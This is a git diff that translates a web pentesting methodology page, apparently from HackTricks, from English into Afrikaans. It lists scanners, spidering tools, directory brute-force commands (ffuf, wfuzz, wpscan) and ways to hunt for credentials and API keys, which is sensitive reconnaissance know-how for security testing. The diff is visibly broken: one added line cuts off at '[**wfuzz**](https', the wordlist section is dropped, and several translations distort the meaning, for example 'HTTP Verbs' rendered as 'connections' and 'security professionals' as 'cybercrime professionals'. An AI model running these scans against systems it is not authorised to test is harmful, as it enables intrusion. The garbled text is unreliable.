@@ -120,28 +116,26 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Wordpress**](wordpress.md) * [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/) -_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._\ -If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks (and let me know!). +Hou in gedagte dat dieselfde domein verskillende tegnologieë in verskillende poorte, vouers en subdomeine kan gebruik. As die webtoepassing enige bekende tegnologie/platform gebruik wat voorheen gelys is of enige ander, moenie vergeet om op die internet te soek na nuwe truuks (en laat weet my asseblief!). -### Source Code Review +### Bronkode-oorsig -If the **source code** of the application is available in **github**, apart of performing by **your own a White box test** of the application there is **some information** that could be **useful** for the current **Black-Box testing**: +As die bronkode van die toepassing beskikbaar is op GitHub, behalwe dat jy self 'n White box-toets van die toepassing uitvoer, is daar inligting wat nuttig kan wees vir die huidige Black-Box-toetsing: -* Is there a **Change-log or Readme or Version** file or anything with **version info accessible** via web? -* How and where are saved the **credentials**? Is there any (accessible?) **file** with credentials (usernames or passwords)? -* Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used? -* Is it using any **master key** for encrypting something? Which **algorithm** is used? -* Can you **access any of these files** exploiting some vulnerability? -* Is there any **interesting information in the github** (solved and not solved) **issues**? Or in **commit history** (maybe some **password introduced inside an old commit**)? 
+* Is daar 'n Change-log of Readme of Version-lêer of enige iets met toeganklike weergaweinligting via die web? +* Hoe en waar word die geloofsbriewe gestoor? Is daar enige (toeganklike?) lêer met geloofsbriewe (gebruikersname of wagwoorde)? +* Is wagwoorde in plain text, geënkripteer of watter hashing-algoritme word gebruik? +* Word enige meestersleutel gebruik om iets te enkripteer? Watter algoritme word gebruik? +* Kan jy enige van hierdie lêers toegang kry deur van 'n kwesbaarheid gebruik te maak? +* Is daar enige interessante inligting in die GitHub (opgeloste en onopgeloste) issues? Of in die commit-geskiedenis (miskien 'n wagwoord wat in 'n ou commit ingevoer is)? {% content-ref url="code-review-tools.md" %} [code-review-tools.md](code-review-tools.md) {% endcontent-ref %} -### Automatic scanners - -#### General purpose automatic scanners +### Outomatiese skanderings +#### Algemene doel outomatiese skanderings ```bash nikto -h whatweb -a 4 
@@ -153,64 +147,60 @@ nuclei -ut && nuclei -target # https://github.com/ignis-sec/puff (client side vulns fuzzer) node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ" ``` +#### CMS-skandeerders -#### CMS scanners - -If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: +As 'n CMS gebruik word, moenie vergeet om 'n skandeerder te **hardloop** nie, dalk word iets interessants gevind: [**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\ -[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ +[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** webwerwe vir sekuriteitskwessies. (GUI)\ [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\ -**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\ +**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **of** [**(M)oodle**](moodle.md)\ [**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md) - ```bash cmsmap [-f W] -F -d wpscan --force update -e --url joomscan --ec -u joomlavs.rb #https://github.com/rastating/joomlavs ``` +> Op hierdie punt moet jy reeds enige inligting hê oor die webbediener wat deur die klient gebruik word (as enige data gegee is) en 'n paar truuks om in gedagte te hou tydens die toets. 
As jy gelukkig is, het jy selfs 'n CMS gevind en 'n paar skanderings uitgevoer. -> At this point you should already have some information of the web server being used by the client (if any data is given) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner. +## Stap-vir-stap Webtoepassingsontdekking -## Step-by-step Web Application Discovery +> Vanaf hier gaan ons begin om met die webtoepassing te interaksieer. -> From this point we are going to start interacting with the web application. +### Aanvanklike kontroles -### Initial checks - -**Default pages with interesting info:** +**Verstekbladsye met interessante inligting:** * /robots.txt * /sitemap.xml * /crossdomain.xml * /clientaccesspolicy.xml * /.well-known/ -* Check also comments in the main and secondary pages. +* Kontroleer ook kommentaar in die hoof- en sekondêre bladsye. -**Forcing errors** +**Forseer foute** -Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**. +Webbedieners kan **onverwags optree** wanneer vreemde data na hulle gestuur word. Dit kan **kwesbaarhede** of **gevoelige inligting openbaar**. -* Access **fake pages** like /whatever\_fake.php (.aspx,.html,.etc) -* **Add "\[]", "]]", and "\[\["** in **cookie values** and **parameter** values to create errors -* Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL** -* Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE +* Toegang tot **vals bladsye** soos /whatever\_fake.php (.aspx, .html, ens.) 
+* Voeg "\[]", "]]" en "\[\[" by **koekie-waardes** en **parameter-waardes** om foute te skep +* Skep 'n fout deur insette te gee as **`/~randomthing/%s`** aan die **einde** van die **URL** +* Probeer **verskillende HTTP-verbindings** soos PATCH, DEBUG of verkeerde soos FAKE -#### **Check if you can upload files (**[**PUT verb, WebDav**](put-method-webdav.md)**)** +#### **Kontroleer of jy lêers kan oplaai (**[**PUT-verbindings, WebDav**](put-method-webdav.md)**)** -If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to: +As jy vind dat **WebDav** **geaktiveer** is, maar jy nie genoeg regte het om lêers in die hoofmap op te laai nie, probeer dan: -* **Brute Force** credentials -* **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders. +* **Brute Force**-geloofsbriewe +* **Laai lêers** via WebDav na die **res** van die **gevonde lêers** binne die webbladsy. Jy mag regte hê om lêers in ander lêers op te laai. -### **SSL/TLS vulnerabilites** +### **SSL/TLS-kwesbaarhede** -* If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM** -* If the application is **sending sensitive data (passwords) using HTTP**. Then it's a high vulnerability. - -Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** (In Bug Bounty programs probably these kind of vulnerabilities won't be accepted) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities: +* As die toepassing **nie die gebruik van HTTPS afdwing nie** in enige deel nie, is dit **kwesbaar vir MitM** +* As die toepassing **gevoelige data (wagwoorde) deur HTTP stuur**. Dit is 'n hoë kwesbaarheid. 
+Gebruik [**testssl.sh**](https://github.com/drwetter/testssl.sh) om te kontroleer vir **kwesbaarhede** (In Bug Bounty-programme sal hierdie soort kwesbaarhede waarskynlik nie aanvaar word nie) en gebruik [**a2sv**](https://github.com/hahwul/a2sv) om die kwesbaarhede weer te kontroleer: ```bash ./testssl.sh [--htmlfile] 10.10.10.10:443 #Use the --htmlfile to save the output inside an htmlfile also 
@@ -219,69 +209,51 @@ Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vul sslscan sslyze --regular ``` - -Information about SSL/TLS vulnerabilities: +Inligting oor SSL/TLS kwesbaarhede: * [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/) * [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/) ### Spidering -Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible. +Begin 'n soort **spinnekop** binne die web. Die doel van die spinnekop is om soveel moontlike paaie van die getoetste toepassing te vind. Daarom moet webkruip en eksterne bronne gebruik word om soveel geldige paaie as moontlik te vind. -* [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com). -* [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source. -* [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files". -* [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org -* [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response. -* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. 
However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile -* [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl) -* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them. -* [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spider with JS rendering capabilities. -* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder. -* [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): To extract endpoints in both HTML source and embedded javascript files. Useful for bug hunters, red teamers, infosec ninjas. -* [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained. -* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Given a file (HTML) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly (minify) files. -* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, several tools): Gather interesting information from JS files using several tools. -* [**subjs**](https://github.com/lc/subjs) (go): Find JS files. -* [**page-fetch**](https://github.com/detectify/page-fetch) (go): Load a page in a headless browser and print out all the urls loaded to load the page. 
-* [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Content discovery tool mixing several options of the previous tools -* [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): A Burp extension to find path and params in JS files. -* [**Sourcemapper**](https://github.com/denandz/sourcemapper): A tool that given the .js.map URL will get you the beatified JS code -* [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): This is a tool used to discover endpoints for a given target. -* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Discover links from the wayback machine (also downloading the responses in the wayback and looking for more links -* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Crawl (even by filling forms) and also find sensitive info using specific regexes. -* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is an advance multi-feature GUI web security Crawler/Spider designed for cyber security professionals. -* [**jsluice**](https://github.com/BishopFox/jsluice) (go): It's a Go package and [command-line tool](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) for extracting URLs, paths, secrets, and other interesting data from JavaScript source code. -* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is a simple **Burp Suite extension** to **extract the paramters and endpoints** from the request to create custom wordlist for fuzzing and enumeration. +* [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spinnekop, LinkFinder in JS-lêers en eksterne bronne (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com). +* [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spinnekop, met LinkFider vir JS-lêers en Archive.org as eksterne bron. +* [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spinnekop, dui ook "sappige lêers" aan. 
+* [**evine** ](https://github.com/saeeddhqan/evine)(go): Interaktiewe CLI HTML spinnekop. Dit soek ook in Archive.org +* [**meg**](https://github.com/tomnomnom/meg) (go): Hierdie instrument is nie 'n spinnekop nie, maar dit kan nuttig wees. U kan net 'n lêer met gasheer en 'n lêer met paaie aandui en meg sal elke pad op elke gasheer haal en die respons stoor. +* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spinnekop met JS-rendering-vermoëns. Dit lyk egter asof dit nie onderhou word nie, die vooraf gekompileerde weergawe is oud en die huidige kode kom nie voor nie. +* [**gau**](https://github.com/lc/gau) (go): HTML spinnekop wat eksterne verskaffers gebruik (wayback, otx, commoncrawl) +* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): Hierdie skrip sal URL's met parameters vind en hulle lys. +* [**galer**](https://github.com/dwisiswant0/galer) (go): HTML spinnekop met JS-rendering-vermoëns. +* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) (python): HTML spinnekop, met JS-verfraaiingsvermoëns wat nuwe paaie in JS-lêers kan soek. Dit kan ook die moeite werd wees om na [JSScanner](https://github.com/dark-warlord14/JSScanner) te kyk, wat 'n omhulsel van LinkFinder is. +* [**goLinkFinder**](https://github.com/0xsha/GoLinkFinder) (go): Om eindpunte in beide HTML-bron en ingebedde javascript-lêers te onttrek. Nuttig vir foutsoekers, rooi spanne, infosec-ninjas. +* [**JSParser**](https://github.com/nahamsec/JSParser) (python2.7): 'N Python 2.7-skrip wat Tornado en JSBeautifier gebruik om relatiewe URL's uit JavaScript-lêers te ontled. Nuttig vir die maklike ontdekking van AJAX-versoeke. Lyk asof dit nie onderhou word nie. +* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) (ruby): Gee 'n lêer (HTML) en sal URL's daaruit onttrek deur gebruik te maak van slim regulêre uitdrukking om die relatiewe URL's uit lelike (verkleinde) lêers te vind en te onttrek. 
+* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) (bash, verskeie instrumente): Versamel interessante inligting uit JS-lêers deur verskeie instrumente te gebruik. +* [**subjs**](https://github.com/lc/subjs) (go): Vind JS-lêers. +* [**page-fetch**](https://github.com/detectify/page-fetch) (go): Laai 'n bladsy in 'n koplose blaaier en druk al die gelaaide URL's om die bladsy te laai. +* [**Feroxbuster**](https://github.com/epi052/feroxbuster) (rust): Inhoudsontdekkingsinstrument wat verskeie opsies van die vorige instrumente meng +* [**Javascript Parsing**](https://github.com/xnl-h4ck3r/burp-extensions): 'N Burp-uitbreiding om paaie en parameters in JS-lêers te vind. +* [**Sourcemapper**](https://github.com/denandz/sourcemapper): 'N Instrument wat die mooi JS-kode sal kry as die .js.map-URL gegee word +* [**xnLinkFinder**](https://github.com/xnl-h4ck3r/xnLinkFinder): Hierdie instrument word gebruik om eindpunte vir 'n gegewe teiken te ontdek. +* [**waymore**](https://github.com/xnl-h4ck3r/waymore)**:** Ontdek skakels van die wayback-masjien (laai ook die antwoorde in die wayback af en soek na meer skakels +* [**HTTPLoot**](https://github.com/redhuntlabs/HTTPLoot) (go): Kruip (selfs deur vorms te vul) en vind ook sensitiewe inligting deur spesifieke regexes te gebruik. +* [**SpiderSuite**](https://github.com/3nock/SpiderSuite): Spider Suite is 'n gevorderde multifunksie-GUI-websekuriteitskruiper/spinnekop wat ontwerp is vir kubermisdaadprofessionele. +* [**jsluice**](https://github.com/BishopFox/jsluice) (go): Dit is 'n Go-pakket en [opdragreël-instrument](https://github.com/BishopFox/jsluice/blob/main/cmd/jsluice) om URL's, paaie, geheime en ander interessante data uit JavaScript-bronkode te onttrek. +* [**ParaForge**](https://github.com/Anof-cyber/ParaForge): ParaForge is 'n eenvoudige **Burp Suite-uitbreiding** om die parameters en eindpunte uit die versoek te onttrek om aangepaste woordelys vir fuzzing en opname te skep. 
-### Brute Force directories and files +### Brute Force-direktore en lêers -Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** (you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories).\ -Tools: +Begin **brute force** vanaf die hoofmap en verseker dat alle gevonde **direktore** met hierdie metode en al die deur die **Spidering** ontdekte direktore **brute force** word (u kan hierdie brute force **rekursief** doen en die name van die gevonde direktore aan die begin van die gebruikte woordelys toevoeg).\ +Instrumente: -* **Dirb** / **Dirbuster** - Included in Kali, **old** (and **slow**) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options. -* [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: It doesn't allow auto-signed certificates but** allows recursive search. -* [**Gobuster**](https://github.com/OJ/gobuster) (go): It allows auto-signed certificates, it **doesn't** have **recursive** search. -* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.** -* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ` -* [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ` -* [**uro**](https://github.com/s0md3v/uro) (python): This isn't a spider but a tool that given the list of found URLs will to delete "duplicated" URLs. 
-* [**Scavenger**](https://github.com/0xDexter0us/Scavenger): Burp Extension to create a list of directories from the burp history of different pages -* [**TrashCompactor**](https://github.com/michael1026/trashcompactor): Remove URLs with duplicated functionalities (based on js imports) -* [**Chamaleon**](https://github.com/iustin24/chameleon): It uses wapalyzer to detect used technologies and select the wordlists to use. - -**Recommended dictionaries:** - -* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt) -* [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt) -* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10) -* [Assetnote wordlists](https://wordlists.assetnote.io) -* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content) - * raft-large-directories-lowercase.txt - * directory-list-2.3-medium.txt - * RobotsDisallowed/top10000.txt -* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) +* **Dirb** / **Dirbuster** - Ingesluit in Kali, **oud** (en **stadig**) maar funksioneel. Laat outomatiese ondertekende sertifikate en rekursiewe soektog toe. Te stadig in vergelyking met die ander opsies. +* [**Dirsearch**](https://github.com/maurosoria/dirsearch) (python)**: Dit laat nie outomatiese ondertekende sertifikate toe nie, maar** maak rekursiewe soektog moontlik. +* [**Gobuster**](https://github.com/OJ/gobuster) (go): Dit laat outomatiese ondertekende sertifikate toe, dit het **nie** rekursiewe soektog nie. 
+* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Vinnig, ondersteun rekursiewe soektog.** +* [**wfuzz**](https * [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries) * [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll) * [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists) 
@@ -289,167 +261,148 @@ Tools: * _/usr/share/wordlists/dirb/big.txt_ * _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_ -_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._ +_Merk op dat enige tyd 'n nuwe gids ontdek word tydens brute-forcing of spidering, dit moet Brute-Forced word._ -### What to check on each file found +### Wat om op elke gevonde lêer te kontroleer -* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers -* **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.** -* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file. 
- * _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db) - * _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params) - * _Assetnote “parameters\_top\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io) - * _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773) -* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**. - * If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page. -* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) - * Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access. -* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. 
In that case, [**check** the **permissions** of the bucket](buckets/). +* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Vind gebroke skakels binne HTML's wat vatbaar kan wees vir oorname +* **Lêer-backups**: Sodra jy al die lêers gevind het, soek na backups van al die uitvoerbare lêers ("_.php_", "_.aspx_"...). Gewone variasies vir die benaming van 'n backup is: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp en file.old._ Jy kan ook die hulpmiddel [**bfac**](https://github.com/mazen160/bfac) **of** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.** gebruik. +* **Ontdek nuwe parameters**: Jy kan hulpmiddels soos [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **en** [**Param Miner**](https://github.com/PortSwigger/param-miner) **gebruik om verskuilde parameters te ontdek. As jy kan, kan jy probeer om** verskuilde parameters op elke uitvoerbare web-lêer te soek. +* _Arjun alle verstek woordelyste:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db) +* _Param-miner "params":_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params) +* _Assetnote "parameters_top_1m":_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io) +* _nullenc0de "params.txt":_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773) +* **Opmerkings:** Kontroleer die opmerkings van al die lêers, jy kan **geloofsbriewe** of **verskuilde funksionaliteit** vind. 
+* As jy **CTF** speel, is 'n "gewone" truuk om **inligting** **binne opmerkings** aan die **regterkant** van die **bladsy** te **versteek** (deur **honderde spasies** te gebruik sodat jy die data nie sien as jy die bronkode met die blaaier oopmaak nie). 'n Ander moontlikheid is om **verskeie nuwe lyne** te gebruik en **inligting te versteek** in 'n opmerking aan die **onderkant** van die webbladsy. +* **API-sleutels**: As jy enige API-sleutel **vind**, is daar 'n gids wat aandui hoe om API-sleutels van verskillende platforms te gebruik: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](https://github.com/l4yton/RegHex\)/)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird) +* Google API-sleutels: As jy enige API-sleutel vind wat lyk soos **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik, kan jy die projek [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) gebruik om te kyk watter API's die sleutel kan gebruik. +* **S3 Buckets**: Terwyl jy spidering doen, kyk of enige **subdomein** of enige **skakel** verband hou met 'n **S3-bucket**. In daardie geval, [**kontroleer** die **toestemmings** van die bucket](buckets/). -### Special findings +### Spesiale bevindinge -**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**. +**Terwyl** jy die **spidering** en **brute-forcing** uitvoer, kan jy **interessante dinge** vind wat jy moet **opmerk**. -**Interesting files** +**Interessante lêers** -* Look for **links** to other files inside the **CSS** files. 
-* [If you find a _**.git**_ file some information can be extracted](git.md) -* If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found. -* If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them. -* **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.** - * You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable. - * **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator) - * **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org) - * **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/)) - * [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.` - * In several occasions you will need to **understand regular expressions** used, this will be useful: [https://regex101.com/](https://regex101.com) -* You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality. +* Soek na **skakels** na ander lêers binne die **CSS**-lêers. 
+* [As jy 'n _**.git**_-lêer vind, kan sekere inligting onttrek word](git.md) +* As jy 'n _**.env**_-lêer vind, kan inligting soos API-sleutels, databasiswagwoorde en ander inligting gevind word. +* As jy **API-eindpunte** vind, [moet jy hulle ook toets](web-api-pentesting.md). Dit is nie lêers nie, maar sal waarskynlik "soos" lêers lyk. +* **JS-lêers**: In die spidering-afdeling is verskeie hulpmiddels genoem wat paaie uit JS-lêers kan onttrek. Dit sal ook interessant wees om **elke gevonde JS-lêer te monitor**, aangesien 'n verandering in sommige gevalle kan aandui dat 'n potensiële kwesbaarheid in die kode ingevoer is. Jy kan byvoorbeeld [**JSMon**](https://github.com/robre/jsmon)**.** gebruik. +* Jy moet ook ontdekte JS-lêers met [**RetireJS**](https://github.com/retirejs/retire.js/) of [**JSHole**](https://github.com/callforpapers-source/jshole) kontroleer om te sien of dit kwesbaar is. +* **Javascript Deobfuscator en Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator) +* **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org) +* **JsFuck deobfuscation** (javascript met karakters: "\[]!+" [https://ooze.ninja/javascript/poisonjs/](https://ooze.ninja/javascript/poisonjs/)) +* [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.` +* In verskeie gevalle sal jy die gebruikte **gewone uitdrukkings** moet verstaan, dit sal nuttig wees: [https://regex101.com/](https://regex101.com) +* Jy kan ook **die lêers monitor waar vorms opgespoor is**, aangesien 'n verandering in die parameter of die verskyning van 'n nuwe vorm moontlik 'n potensiële nuwe kwesbare funksionaliteit kan aandui. 
